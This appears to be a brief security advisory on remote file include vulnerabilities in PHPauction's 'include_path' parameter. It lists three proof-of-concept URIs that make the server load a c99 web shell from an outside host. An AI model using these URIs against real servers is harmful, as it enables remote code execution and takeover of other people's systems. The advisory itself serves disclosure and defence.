PHPauction 'include_path' Parameter Multiple Remote File Include Vulnerabilities

PHPauction 'include_path' Parameter Multiple Remote File Include Vulnerabilities

An attacker can exploit these issues via a browser.

The following proof-of-concept URIs are available:

http://www.example.com/auction/includes/converter.inc.php?include_path=http://www.example2.com/shells/c99in.txt?
http://www.example.com/auction/includes/messages.inc.php?include_path=http://www.example2.com/shells/c99in.txt?
http://www.example.com/auction/includes/settings.inc.php?include_path=http://www.example2.com/shells/c99in.txt?